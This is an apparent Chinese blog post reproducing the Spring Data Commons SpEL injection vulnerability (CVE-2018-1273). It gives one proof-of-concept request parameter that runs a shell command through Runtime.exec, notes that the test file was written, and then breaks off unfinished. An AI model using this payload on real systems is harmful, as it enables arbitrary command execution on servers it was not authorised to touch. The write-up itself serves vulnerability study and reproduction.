一 漏洞简介
Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及 以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令
1.1漏洞利用
1.2漏洞复现
访问
然后填写注册信息,抓包
加入POC
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t ouch /tmp/zcc")]=&password=&repeatedPassword=
进入kali终端发现成功写入
环境出问题了 改天补齐
标签:spring,1273,Commons,漏洞,SpEL,2018,Spring,Data,表达式 From: https://blog.csdn.net/2201_75891821/article/details/140999258